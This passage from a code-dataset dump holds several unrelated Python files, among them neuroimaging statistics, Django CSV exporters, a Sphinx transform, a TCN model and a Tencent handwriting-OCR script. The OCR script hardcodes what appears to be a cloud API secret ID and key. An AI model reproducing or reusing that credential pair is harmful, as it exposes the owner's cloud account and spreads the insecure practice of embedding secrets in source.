lh_ct['sub-bbc105']\nlh_ct['208-106'] = lh_ct['sub-bbc208'] - lh_ct['sub-bbc106']\nlh_ct['202-108'] = lh_ct['sub-bbc202'] - lh_ct['sub-bbc108']\nlh_ct['249-113'] = lh_ct['sub-bbc249'] - lh_ct['sub-bbc113']\nlh_ct['241-116'] = lh_ct['sub-bbc241'] - lh_ct['sub-bbc116']\nlh_ct['243-118'] = lh_ct['sub-bbc243'] - lh_ct['sub-bbc118']\nlh_ct['231-119'] = lh_ct['sub-bbc231'] - lh_ct['sub-bbc119']\nlh_ct['253-120'] = lh_ct['sub-bbc253'] - lh_ct['sub-bbc120']\nlh_paired_sub = lh_ct[['209-101', '211-105', '208-106', '202-108', '249-113', '241-116', '243-118', '231-119', '253-120']]\nlh_paired_sub = lh_paired_sub.transpose()\n\nlh_ct_stats = lh_paired_sub.apply(ss.ttest_1samp, axis=0, args=(0.0,)).apply(pd.Series)\nlh_ct_stats.columns = ['lh-tstat', 'lh-p-value']\nlh_ct_stats.index.name = 'Region'\n## leave region names alone to match with thickness files\n# lh_ct_stats['Region'] = lh_ct_stats.index.str.replace('lh_', '').str.replace('_thickness', '')\n#lh_sig_results = lh_ct_stats[lh_ct_stats['lh-p-value'] <= 0.05].sort_values(by='lh-p-value')\n#lh_sig_results.set_index('Region')\n\nrh_ct['209-101'] = rh_ct['sub-bbc209'] - rh_ct['sub-bbc101']\nrh_ct['211-105'] = rh_ct['sub-bbc211'] - rh_ct['sub-bbc105']\nrh_ct['208-106'] = rh_ct['sub-bbc208'] - rh_ct['sub-bbc106']\nrh_ct['202-108'] = rh_ct['sub-bbc202'] - rh_ct['sub-bbc108']\nrh_ct['249-113'] = rh_ct['sub-bbc249'] - rh_ct['sub-bbc113']\nrh_ct['241-116'] = rh_ct['sub-bbc241'] - rh_ct['sub-bbc116']\nrh_ct['243-118'] = rh_ct['sub-bbc243'] - rh_ct['sub-bbc118']\nrh_ct['231-119'] = rh_ct['sub-bbc231'] - rh_ct['sub-bbc119']\nrh_ct['253-120'] = rh_ct['sub-bbc253'] - rh_ct['sub-bbc120']\nrh_paired_sub = rh_ct[['209-101', '211-105', '208-106', '202-108', '249-113', '241-116', '243-118', '231-119', '253-120']]\nrh_paired_sub = rh_paired_sub.transpose()\n\nrh_ct_stats = rh_paired_sub.apply(ss.ttest_1samp, axis=0, args=(0.0,)).apply(pd.Series)\nrh_ct_stats.columns = ['rh-tstat', 'rh-p-value']\nrh_ct_stats.index.name = 'Region'\n## leave region names alone to match with thickness files\n# rh_ct_stats['Region'] = rh_ct_stats.index.str.replace('rh_', '').str.replace('_thickness', '')\n# rh_sig_results = rh_ct_stats[rh_ct_stats['rh-p-value'] <= 0.05].sort_values(by='rh-p-value')\n# rh_sig_results.set_index('Region')\n# # merge stat results\n# rh_sig_results.merge(lh_sig_results, left_on='Region', right_on='Region', how='outer').fillna('').set_index('Region').sort_values(['rh-p-value', 'lh-p-value'])\n\n# read in verticees to test against derived from freesurfer mri_annotation2label such as\n# mri_annotation2label --subject template_hires_br_freesurf_v6 --hemi lh --annotation aparc.a2009s --outdir test\nlabel_dir = fs / project / 'reg' / 'ants_vbm_pairedLH_in_template_space' / 'template_hires_br_freesurf_v6' / 'label' / 'test'\nlabel_flist = label_dir.glob('*.label')\nall_labels = {}\nfor label_fname in label_flist:\n label = 'ctx_' + str(label_fname.name).replace('.label', '').replace('.', '_')\n all_labels[label] = []\n reader = csv.reader(open(str(label_fname)), skipinitialspace=True, delimiter=' ')\n #skip 1st 2 lines\n next(reader, None)\n next(reader, None)\n for row in reader:\n all_labels[label].append(int(row[0]))\n\n# read, find region, replace, write new thickness file\nlh_ct_fname = fs/project/'reg'/'ants_vbm_pairedLH_in_template_space'/'template_hires_br_freesurf_v6'/'surf'/'lh.thickness.asc'\nlh_contrl_mean_ct_fname = lh_ct_fname.parent/'lh.control_mean_thickness.asc'\nlh_fost_mean_ct_fname = lh_ct_fname.parent/'lh.foster_mean_thickness.asc'\nlh_mean_diff_ct_fname = lh_ct_fname.parent/'lh.mean_diff_thickness.asc'\nlh_ct_tstat_fname = lh_ct_fname.parent/'lh.tstat_thickness.asc'\nlh_ct_1minp_fname = lh_ct_fname.parent/'lh.1minp_thickness.asc'\n\nwith open(str(lh_ct_fname), 'rb') as lh_ct , open(str(lh_contrl_mean_ct_fname), 'wb') as lh_contrl_mean_ct , \\\n open(str(lh_fost_mean_ct_fname), 'wb') as lh_fost_mean_ct, \\\n open(str(lh_mean_diff_ct_fname), 'wb') as lh_mean_diff_ct, \\\n open(str(lh_ct_tstat_fname), 'wb') as lh_ct_tstat, \\\n open(str(lh_ct_1minp_fname), 'wb') as lh_ct_1minp:\n reader = csv.reader(lh_ct, skipinitialspace=True, delimiter=' ')\n cntrl_writer = csv.writer(lh_contrl_mean_ct, delimiter=' ')\n foster_writer = csv.writer(lh_fost_mean_ct, delimiter=' ')\n diff_writer = csv.writer(lh_mean_diff_ct, delimiter=' ')\n tstat_writer = csv.writer(lh_ct_tstat, delimiter=' ')\n _1minp_writer = csv.writer(lh_ct_1minp, delimiter=' ')\n for row in reader:\n # get vertex\n vert = int(row[0])\n # get region\n region = [k for k, v in all_labels.items() if vert in v][0]\n if region == '':\n cntrl_thickn = [2.785]\n foster_thickn = [2.7127]\n diff_thickn = [0.0732]\n tstat_thickn = [0]\n _1minp_thickn = [0]\n else:\n # convert cortical region name to cortical thickness name\n region = region.replace('ctx_', '') + '_thickness'\n # get thickness info\n try:\n cntrl_thickn = [round(lh_ct_ctrl.mean(axis=1)[region], 5)]\n foster_thickn = [round(lh_ct_fost.mean(axis=1)[region], 5)]\n diff_thickn = [round(lh_paired_sub.mean(axis=0).loc[region], 5)]\n tstat_thickn = [round(lh_ct_stats.loc[region, 'lh-tstat'], 5)]\n _1minp_thickn = [round(1 - lh_ct_stats.loc[region, 'lh-p-value'], 5)]\n except:\n cntrl_thickn = [2.785]\n foster_thickn = [2.7127]\n diff_thickn = [0.0732]\n tstat_thickn = [0]\n _1minp_thickn = [0]\n print('exception caught in region '+region+' for vertice number '+str(vert))\n # replace orig row values with stats\n new_ctrl_row = row[:4] + cntrl_thickn\n new_foster_row = row[:4] + foster_thickn\n new_diff_row = row[:4] + diff_thickn\n new_tstat_row = row[:4] + tstat_thickn\n new_1minp_row = row[:4] + _1minp_thickn\n # write new rows to files\n cntrl_writer.writerow(new_ctrl_row)\n foster_writer.writerow(new_foster_row)\n diff_writer.writerow(new_diff_row)\n tstat_writer.writerow(new_tstat_row)\n _1minp_writer.writerow(new_1minp_row)\n\n# use freesurfer mris_convert to convert back to curv file\nresults = ()\nwith WorkingContext(str(lh_ct_fname.parent)):\n for ct_file in [lh_contrl_mean_ct_fname, lh_fost_mean_ct_fname, lh_mean_diff_ct_fname, lh_ct_tstat_fname, lh_ct_1minp_fname]:\n cmd = ['mris_convert', '-c', str(ct_file), str(ct_file.parent)+'/lh.orig']\n cmd += [str(ct_file.parent)+'/'+str(ct_file.stem).replace('_thickness', '.thickness')]\n cmd = ' '.join(cmd)\n results += run_subprocess(cmd)\n","sub_path":"mmimproc/projects/bbc/struc/freesurf_cort_thick.py","file_name":"freesurf_cort_thick.py","file_ext":"py","file_size_in_byte":8281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"75731969","text":"from treasuryCOA.export_csv import (\n EXPORT_L5_FIELD_ITERATOR_HEADERS,\n EXPORT_L5_HIERARCHY_ITERATOR_HEADERS,\n l5_field_obj,\n l5_hierarchy_obj,\n)\n\nEXPORT_NAC_ITERATOR_HEADERS = (\n EXPORT_L5_HIERARCHY_ITERATOR_HEADERS\n + [\"Level 6\", \"Level 6 Description\"]\n + EXPORT_L5_FIELD_ITERATOR_HEADERS\n + [\n \"Used for budget\",\n \"Budget Grouping\",\n \"Budget Category\",\n \"Commercial Category\",\n \"Operational Delivery Plan\",\n \"Prime NAC\",\n \"Active\",\n ]\n)\n\n\ndef _export_nac_iterator(queryset):\n yield EXPORT_NAC_ITERATOR_HEADERS\n\n for obj in queryset:\n yield l5_hierarchy_obj(obj.account_L5_code) + [\n obj.natural_account_code,\n obj.natural_account_code_description,\n ] + l5_field_obj(obj.account_L5_code) + [\n obj.used_for_budget,\n obj.expenditure_category.NAC_category.NAC_category_description\n if obj.expenditure_category\n else \"-\",\n obj.expenditure_category.grouping_description\n if obj.expenditure_category\n else \"-\",\n obj.commercial_category.commercial_category\n if obj.commercial_category\n else \"N/A\",\n obj.expenditure_category.op_del_category.operating_delivery_description\n if obj.expenditure_category and obj.expenditure_category.op_del_category\n else \"N/A\",\n obj.expenditure_category.linked_budget_code.natural_account_code\n if obj.expenditure_category\n else \"-\",\n obj.active,\n ]\n\n\ndef _export_historical_nac_iterator(queryset):\n yield [\n \"Level 6\",\n \"Level 6 Description\",\n \"used for budget\",\n \"Budget Category\",\n \"Budget Grouping\",\n \"Commercial Category\",\n \"account L5 code\",\n \"account L5 description\",\n \"Prime NAC\",\n \"L5 for OSCAR upload\",\n \"Expenditure Type\",\n \"active\",\n \"financial year\",\n \"archived\",\n ]\n for obj in queryset:\n yield [\n obj.natural_account_code,\n obj.natural_account_code_description,\n obj.used_for_budget,\n obj.expenditure_category.grouping_description\n if obj.expenditure_category\n else \"-\",\n obj.NAC_category,\n obj.commercial_category,\n obj.account_L5_code,\n obj.account_L5_description,\n obj.account_L6_budget,\n obj.account_L5_code_upload,\n obj.economic_budget_code,\n obj.active,\n obj.financial_year.financial_year_display,\n obj.archived,\n ]\n\n\ndef _export_exp_cat_iterator(queryset):\n yield [\n \"Budget Grouping\",\n \"Expenditure Category\",\n \"Description\",\n \"Further Description\",\n \"Budget NAC\",\n \"Budget NAC Description\",\n \"Operating Delivery Plan\",\n ]\n for obj in queryset:\n yield [\n obj.NAC_category.NAC_category_description,\n obj.grouping_description,\n obj.description,\n obj.further_description,\n obj.linked_budget_code.natural_account_code,\n obj.linked_budget_code.natural_account_code_description,\n obj.op_del_category.operating_delivery_description\n if obj.op_del_category\n else \"-\",\n ]\n\n\ndef _export_historical_exp_cat_iterator(queryset):\n yield [\n \"Budget Category\",\n \"description\",\n \"further description\",\n \"Budget Code\",\n \"Budget Description\",\n \"Budget Grouping\",\n \"financial year\",\n \"archived\",\n ]\n for obj in queryset:\n yield [\n obj.grouping_description,\n obj.description,\n obj.further_description,\n obj.linked_budget_code,\n obj.linked_budget_code_description,\n obj.NAC_category_description,\n obj.financial_year.financial_year_display,\n obj.archived,\n ]\n\n\ndef _export_comm_cat_iterator(queryset):\n yield [\"Commercial Category\", \"Description\", \"Approvers\"]\n for obj in queryset:\n yield [obj.commercial_category, obj.description, obj.approvers]\n\n\ndef _export_historical_comm_cat_iterator(queryset):\n yield [\n \"Commercial Category\",\n \"Description\",\n \"Approvers\",\n \"financial year\",\n \"archived\",\n ]\n for obj in queryset:\n yield [\n obj.commercial_category,\n obj.description,\n obj.approvers,\n obj.financial_year.financial_year_display,\n obj.archived,\n ]\n\n\ndef _export_op_del_cat_iterator(queryset):\n yield [\"Operating Delivery Plan Category\"]\n\n for obj in queryset:\n yield [obj.operating_delivery_description]\n\n\ndef _export_nac_cat_iterator(queryset):\n yield [\"Budget Grouping\"]\n\n for obj in queryset:\n yield [obj.NAC_category_description]\n\n\ndef _export_programme_iterator(queryset):\n yield [\"Programme Code\", \"Description\", \"Budget Type\", \"Active\"]\n for obj in queryset:\n yield [\n obj.programme_code,\n obj.programme_description,\n obj.budget_type.budget_type,\n obj.active,\n ]\n\n\ndef _export_historical_programme_iterator(queryset):\n yield [\n \"Programme Code\",\n \"Description\",\n \"Budget Type\",\n \"Active\",\n \"Financial Year\",\n \"Archived Date\",\n ]\n for obj in queryset:\n yield [\n obj.programme_code,\n obj.programme_description,\n obj.budget_type,\n obj.active,\n obj.financial_year.financial_year_display,\n obj.archived,\n ]\n\n\ndef _export_inter_entity_l1_iterator(queryset):\n yield [\"L1 Value\", \"L1 Description\"]\n for obj in queryset:\n yield [obj.l1_value, obj.l1_description]\n\n\ndef _export_fco_mapping_iterator(queryset):\n yield [\n \"FCO (Prism) Code\",\n \"FCO (Prism) Description\",\n \"Oracle (DIT) Code\",\n \"Oracle (DIT) Description\",\n \"Active\",\n ]\n for obj in queryset:\n yield [\n obj.fco_code,\n obj.fco_description,\n obj.account_L6_code_fk.natural_account_code,\n obj.account_L6_code_fk.natural_account_code_description,\n obj.active,\n ]\n\n\ndef _export_historical_fco_mapping_iterator(queryset):\n yield [\n \"FCO (Prism) Code\",\n \"FCO (Prism) Description\",\n \"Oracle (DIT) Code\",\n \"Oracle (DIT) Description\",\n \"Budget Grouping\",\n \"Budget Category\",\n \"Expenditure Type\",\n \"Active\",\n \"Financial Year\",\n \"Archived Date\",\n ]\n for obj in queryset:\n yield [\n obj.fco_code,\n obj.fco_description,\n obj.account_L6_code,\n obj.account_L6_description,\n obj.nac_category_description,\n obj.budget_description,\n obj.economic_budget_code,\n obj.active,\n obj.financial_year.financial_year_display,\n obj.archived,\n ]\n\n\ndef _export_inter_entity_iterator(queryset):\n yield [\"L1 Value\", \"L1 Description\", \"L2 Value\", \"L2 Description\", \"CPID\", \"Active\"]\n for obj in queryset:\n yield [\n obj.l1_value.l1_value,\n obj.l1_value.l1_description,\n obj.l2_value,\n obj.l2_description,\n obj.cpid,\n obj.active,\n ]\n\n\ndef _export_historical_inter_entity_iterator(queryset):\n yield [\n \"Government Body\",\n \"Government Body Description\",\n \"ORACLE - Inter Entity Code\",\n \"ORACLE - Inter Entity Description\",\n \"Treasury - CPID (Departmental Code No.)\",\n \"active\",\n \"financial year\",\n \"archived\",\n ]\n for obj in queryset:\n yield [\n obj.l1_value,\n obj.l1_description,\n obj.l2_value,\n obj.l2_description,\n obj.cpid,\n obj.active,\n obj.financial_year.financial_year_display,\n obj.archived,\n ]\n","sub_path":"chartofaccountDIT/exportcsv.py","file_name":"exportcsv.py","file_ext":"py","file_size_in_byte":8128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"105258981","text":"# -*- coding: utf-8 -*-\nfrom docutils import nodes\nfrom sphinx import transforms\nfrom sphinx.transforms import SphinxTransform\nfrom sphinx.util import logging\n\n\nclass IdgxmlFootnoteTransform(SphinxTransform):\n default_priority = 300\n\n def transform_indd_table(self):\n ths = self.document.traverse(nodes.thead)\n if len(ths) == 0:\n return\n for th in ths:\n tb = th.parent.traverse(nodes.tbody)[0]\n tb.insert(0, th.children[0])\n th.parent.remove(th)\n\n def transform_chaptered_doc(self):\n fns = self.document.traverse(nodes.footnote)\n fn_refs = self.document.traverse(nodes.footnote_reference)\n if 'docname' not in self.document.attributes:\n return\n for fn in fns:\n fn['ids'][0] = '{}-{}'.format(fn['docname'].split('/')[1], fn['ids'][0])\n for fn_ref in fn_refs:\n fn_ref['refid'] = '{}-{}'.format(fn_ref['docname'], fn_ref['refid'])\n\n def apply(self):\n # type: () -> None\n if 'indesign' not in self.app.builder.name:\n return\n\n if self.app.builder.name == 'chapteredindesign':\n self.transform_chaptered_doc()\n\n fns = self.document.traverse(nodes.footnote)\n fn_refs = self.document.traverse(nodes.footnote_reference)\n\n self.transform_indd_table()\n\n for fn_ref in fn_refs:\n for fn in fns:\n if fn['ids'][0] in fn_ref['refid']:\n if fn_ref in fn_ref.parent.children:\n fn_ref.parent.replace(old=fn_ref, new=fn.deepcopy())\n fn['classes'].append('obsolated')\n\n\ndef setup(app):\n app.add_post_transform(IdgxmlFootnoteTransform)\n","sub_path":"sphinxcontrib/indesignbuilder/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"22004938","text":"import itertools\nimport logging\nimport os\nimport re\nimport sets\nimport sys\nimport urllib\nfrom xml.sax import saxutils\n\nfrom minds.config import cfg\nfrom minds.cgibin.util import request\nfrom minds.cgibin.util import response\nfrom minds import weblib\nfrom minds.weblib import query_wlib\nfrom minds.weblib import store\n\nlog = logging.getLogger('cgi.wlibfrm')\n\n\n## todo: when nothing selected?\n\n# /weblib/multiform?action=organize&271=on&132=on&157=on&203=on\n# /weblib/multiform?method=POST&id_list=840&option=set_option&set_tags=tech&add_tags=&remove_tags=&action=OK&create_tags=\n\nTAG_DELETE, TAG_UNCHANGE, TAG_SELECT = range(1,4)\n\n\ndef main(rfile, wfile, env):\n req = request.Request(rfile, env)\n if req.method == 'GET':\n doShowForm(wfile, req)\n elif req.method == 'POST':\n doPost(wfile, req)\n elif req.method == 'DELETE':\n doDelete(wfile, req)\n\n\ndef _buildEntries(req):\n # scan for ddd=On from 'checkbox' fields or id_list='ddd,ddd' from 'hidden' field\n # build the id list ids.\n id_list = req.param('id_list').split(',')\n\n wlib = store.getWeblib()\n\n entries = []\n for k in itertools.chain(req.form.keys(), id_list):\n k = k.strip()\n if not k.isdigit():\n continue\n item = wlib.webpages.getById(int(k))\n if item:\n entries.append(item)\n\n return entries\n\n\ndef _buildChecklist(req):\n \"\"\" @return list of (tag, value) \"\"\"\n wlib = store.getWeblib()\n checklist = [] # list of (tag, flag)\n p = re.compile('\\@\\d+changed')\n for changed_key in req.form:\n if not p.match(changed_key):\n continue\n if not req.param(changed_key):\n continue\n key = changed_key[:-len('changed')] # strip 'changed' to get @id\n try:\n id = int(key[1:])\n except:\n continue\n tag = wlib.tags.getById(id)\n if not tag:\n continue\n flag = bool(req.param(key))\n checklist.append((tag,flag))\n\n return checklist\n\n\ndef doShowForm(wfile, req, errors=[], checklist=[], new_tags=[]):\n entries = _buildEntries(req)\n\n # build ids, names\n ids = [item.id for item in entries]\n names = [unicode(item) for item in entries[:3]]\n if len(entries) > 3:\n names.append('...')\n\n # TODO BUG: below will fail if there is no entries\n\n # build all_tags, some_tags\n all_tags = None\n some_tags = sets.Set()\n for item in entries:\n if all_tags == None:\n # only instantiate this the first time\n all_tags = sets.Set(item.tags)\n else:\n all_tags.intersection_update(item.tags)\n some_tags.union_update(item.tags)\n\n some_tags.difference_update(all_tags)\n tags = [(tag.name, tag.id, TAG_SELECT, False) for tag in all_tags] + \\\n [(tag.name, tag.id, TAG_UNCHANGE, False) for tag in some_tags]\n tags.sort()\n tags = [[id, name, flag, changed] for name, id, flag, changed in tags]\n\n # restore checkbox state from previous page\n for tag, flag in checklist:\n for tagItem in tags:\n if tagItem[0] == tag.id:\n # make flag either TAG_SELECT or TAG_DELETE\n tagItem[2] = flag and TAG_SELECT or TAG_DELETE\n tagItem[3] = True\n\n # refill if data entered for this form\n add_tags = req.param('add_tags')\n\n MultiFormRenderer(wfile).output(\n errors,\n new_tags,\n ids,\n names,\n tags,\n add_tags,\n )\n\n\ndef doPost(wfile, req):\n wlib = store.getWeblib()\n entries = _buildEntries(req)\n checklist = _buildChecklist(req)\n errors = []\n\n # parse add tags\n tags_description = req.param('add_tags')\n if weblib.Tag.hasIllegalChar(tags_description.replace(',',' ')):\n errors.append('These characters are not allowed in tag name: ' + weblib.Tag.ILLEGAL_CHARACTERS)\n tags_description = ''\n\n # check for new tags and the create_tags flag\n _, unknown = weblib.parseTags(wlib, tags_description)\n if unknown and (not req.param('create_tags')):\n tags = u', '.join(unknown)\n errors.append('These tags are not previous used: ' + tags)\n tags_description = ''\n\n # note: validation should be done, new tags will be created here\n set_tags = weblib.makeTags(store.getStore(), tags_description)\n remove_tags = []\n\n # going through checklist, add to set_tags, delete_tags\n for tag, flag in checklist:\n if flag:\n if tag not in set_tags:\n set_tags.append(tag)\n else:\n remove_tags.append(tag)\n\n if errors:\n doShowForm(wfile, req, errors, checklist=checklist, new_tags=unknown)\n return\n\n log.debug('EditTags for %s entries set(%s) remove(%s).', len(entries), set_tags, remove_tags)\n wlib.editTags(entries, [], set_tags, remove_tags)\n store.getStore().refresh_when_needed()\n\n response.redirect(wfile, '/updateParent')\n\n\ndef doDelete(wfile, req):\n wlib = store.getWeblib()\n entries = _buildEntries(req)\n for item in entries:\n try:\n log.debug('Delete web page: %s', unicode(item))\n store.getStore().removeItem(item)\n except:\n log.exception('Unable to delete: %s', unicode(item))\n store.getStore().refresh_when_needed()\n\n response.redirect(wfile, '/updateParent')\n\n\n# ----------------------------------------------------------------------\n\nclass MultiFormRenderer(response.CGIRenderer):\n TEMPLATE_FILE = 'weblibMultiForm.html'\n \"\"\" 2005-12-09\n con:form\n con:id_list\n con:error\n con:message\n rep:title\n rep:tag\n con:checkbox\n con:hidden\n con:tagName\n con:add_tags\n con:new_tags_js_var\n \"\"\"\n def render(self, node, errors, new_tags, ids, names, tags, add_tags=''):\n \"\"\"\n @param tags - list of (id, name, flag, changed)\n \"\"\"\n\n form = node.form\n if errors:\n escaped_errors = map(saxutils.escape, errors)\n form.error.message.raw = '
'.join(escaped_errors)\n else:\n form.error.omit()\n\n form.id_list.atts['value'] = ','.join(map(str,ids))\n\n form.title.repeat(self.renderTitle, names)\n\n form.tag.repeat(self.renderTag, tags)\n\n form.add_tags.atts['value'] = add_tags\n\n tags = new_tags and u', '.join(new_tags) or ''\n encode_tags = response.jsEscapeString(tags)\n node.form.new_tags_js_var.raw = node.form.new_tags_js_var.raw % encode_tags\n\n\n def renderTitle(self, node, title):\n node.content = title\n\n\n def renderTag(self, node, item):\n id, tag, flag, changed = item\n node.checkbox.atts['name'] = '@%s' % id\n node.hidden.atts['id'] = node.hidden.atts['id'] % id\n node.hidden.atts['name'] = node.hidden.atts['name'] % id\n node.tagName.content = tag\n\n # set/restore the checked and changed state\n node.atts['class'] = (flag == TAG_UNCHANGE) and 'tagUnchange' or 'tagChange'\n if flag == TAG_DELETE:\n del node.checkbox.atts['checked']\n if changed:\n node.hidden.atts['value'] = '1'\n\n\nif __name__ == \"__main__\":\n main(sys.stdin, sys.stdout, os.environ)","sub_path":"trunk/minds/cgibin/weblibMultiForm.py","file_name":"weblibMultiForm.py","file_ext":"py","file_size_in_byte":7262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"74694746","text":"import torch.nn.functional as F\nfrom torch import nn\nfrom models.tcn import TemporalConvNet\nimport torch\n\nclass TCN(nn.Module):\n def __init__(self, **kwargs):\n super(TCN, self).__init__()\n self.input_size = kwargs['input_channels']\n self.wavelet = kwargs['wavelet']\n self.input_length = kwargs['input_length']\n output_size = kwargs['output_size']\n kernel_size = kwargs['kernel_size']\n dropout = kwargs['dropout']\n num_channels = kwargs['channel_lst']\n wavelet_output_size = kwargs['wavelet_output_size']\n num_channels = [int(x) for x in num_channels.split(',')]\n linear_size = num_channels[-1]\n\n if self.wavelet:\n self.input_size = self.input_size//2\n wvlt_size = self.input_length * self.input_size // 2\n self.linear_wavelet = nn.Linear(wvlt_size, wavelet_output_size)\n linear_size += 2 * wavelet_output_size\n\n self.tcn = TemporalConvNet(\n self.input_size,\n num_channels,\n kernel_size=kernel_size,\n dropout=dropout)\n \n self.input_bn = nn.BatchNorm1d(linear_size)\n self.linear = nn.Linear(linear_size, output_size)\n \n\n def forward(self, inputs, positive, negative, need_triplet_emb=True):\n \"\"\"Inputs have to have dimension (N, C_in, L_in)\"\"\"\n if self.wavelet:\n splits = torch.split(inputs, self.input_size, dim=2)\n inputs = splits[0]\n wvlt_inputs = splits[1]\n wvlt_inputs_1 = torch.split(wvlt_inputs,\n self.input_length // 2,\n dim=1)[0]\n wvlt_inputs_2 = torch.split(wvlt_inputs,\n self.input_length // 2,\n dim=1)[1]\n bsize = inputs.size()[0]\n wvlt_out1 = self.linear_wavelet(\n wvlt_inputs_1.reshape(bsize, -1, 1).squeeze())\n wvlt_out2 = self.linear_wavelet(\n wvlt_inputs_2.reshape(bsize, -1, 1).squeeze())\n\n inputs = inputs.permute(0, 2, 1)\n y1 = self.tcn(inputs) # input should have dimension (N, C, L)\n last = y1[:, :, -1]\n \n if self.wavelet:\n last = torch.cat([last, wvlt_out1, wvlt_out2], dim=1)\n\n normalized = self.input_bn(last)\n o = self.linear(normalized)\n # return o, {'orig': last, 'pos': None, 'neg': None}\n return o, {'orig': normalized, 'pos': None, 'neg': None}\n\n","sub_path":"models/tcn_model.py","file_name":"tcn_model.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"306750539","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n 腾讯手写体识别\n\"\"\"\n\n__author__ = 'Van23qf'\n\n\nimport base64\nimport json\n\nfrom tencentcloud.common import credential\nfrom tencentcloud.common.profile.client_profile import ClientProfile\nfrom tencentcloud.common.profile.http_profile import HttpProfile\nfrom tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException\nfrom tencentcloud.ocr.v20181119 import ocr_client, models\n\n\ndef ocr(pic):\n try:\n with open(pic, 'rb') as f:\n f1 = f.read()\n pic_base64 = str(base64.b64encode(f1), 'utf-8')\n cred = credential.Credential(\"AKID96rMeho9uQiqjRvCI8C3f6esstjMjFZi\", \"3toZ7RmtlSv9EA0f8LNJ6i6MOYXHoQr5\")\n httpProfile = HttpProfile()\n httpProfile.endpoint = \"ocr.tencentcloudapi.com\"\n\n clientProfile = ClientProfile('TC3-HMAC-SHA256')\n clientProfile.httpProfile = httpProfile\n client = ocr_client.OcrClient(cred, \"ap-guangzhou\", clientProfile)\n\n req = models.GeneralHandwritingOCRRequest()\n params = '{\"ImageBase64\":\"' + pic_base64 + '\"}'\n req.from_json_string(params)\n\n resp = client.GeneralHandwritingOCR(req)\n resp = json.loads(resp.to_json_string())\n if not resp.get('TextDetections'):\n return {'status': False, 'msg': '识别失败'}\n data = []\n for v in resp['TextDetections']:\n data.append(v['DetectedText'])\n return {'status': True, 'msg': 'success', 'data': data}\n except FileNotFoundError as err_file:\n return {'status': False, 'msg': err_file.strerror}\n except TencentCloudSDKException as err:\n return {'status': False, 'msg': err.get_message()}\n\n\nif __name__ == '__main__':\n result = ocr('../uploads/jibing.png')\n print(result)\n","sub_path":"api/TencentHandwriting.py","file_name":"TencentHandwriting.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"423810263","text":"from django.conf.urls import url\nfrom views import (\n descriptor,\n sso_idp_select,\n sso_response,\n sso_single_logout,\n sso_test,\n)\n\nurlpatterns = [\n url(r'^test/$', sso_test),\n url(r'^idpselect/$', sso_idp_select),\n url(r'^acs/$', sso_response),\n url(r'^singlelogout/$', sso_single_logout, name='sso_single_logout'),\n url(r'^metadata/', descriptor, name='spssodescriptor'),\n]\n","sub_path":"saml2sp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"251376814","text":"#coding=utf8\r\n__author__ = 'Administrator'\r\n#与运算符类似,许多内置函数也都是调用对象的特殊方法。比如:\r\n\r\nlen([1,2,3]) # 返回表中元素的总数\r\n#实际上做的是:\r\n[1,2,3].__len__()\r\n#相对与__len__(),内置函数len()也起到了简化书写的作用。\r\n\r\n#下面是我们常见的表元素引用方式:\r\nli = [1, 2, 3, 4, 5, 6]\r\nprint(li[3])\r\n#上面的程序运行到li[3]的时候,Python发现并理解[]符号,然后调用__getitem__()方法。\r\nli = [1, 2, 3, 4, 5, 6]\r\nprint(li.__getitem__(3))\r\n#------------------------------\r\nprint(\"------------------------------\")\r\n#任何一个有__call__()特殊方法的对象都被当作是函数。比如下面的例子:\r\nclass SampleMore(object):\r\n def __call__(self, a):\r\n return a + 5\r\n\r\nadd = SampleMore() # A function object\r\nprint(add(2)) # Call function\r\nmap(add, [2, 4, 5]) # Pass around function object\r\n","sub_path":"pythonDemo/src/main/tuLing2Version/raise/Built_in_function.py","file_name":"Built_in_function.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"224302244","text":"#\n# Copyright (c) 2015-2019 Thierry Florac \n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n\n\"\"\"PyAMS_site.scripts module\n\nThis module provides a \"pyams_upgrade\" command line utility, which can be used to\n\"upgrade\" a site, which means creating all it's required persistent utilities and\nregistering them into it's local site manager.\n\"\"\"\n\nimport argparse\nimport sys\nimport textwrap\n\nfrom pyramid.paster import bootstrap\n\nfrom pyams_site.generations import upgrade_site\n\n\n__docformat__ = 'restructuredtext'\n\n\ndef pyams_upgrade_cmd():\n \"\"\"Check for site upgrade\"\"\"\n usage = \"usage: {0} config_uri\".format(sys.argv[0])\n description = \"\"\"Check for database upgrade.\n Usage: pyams_upgrade production.ini\n \"\"\"\n parser = argparse.ArgumentParser(usage=usage,\n description=textwrap.dedent(description))\n parser.add_argument('config_uri', help='Name of configuration file')\n args = parser.parse_args()\n\n config_uri = args.config_uri\n env = bootstrap(config_uri)\n closer = env['closer']\n try:\n upgrade_site(env['request'])\n finally:\n closer()\n","sub_path":"src/pyams_site/scripts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"399933970","text":"from src.databases.DropsDAO import 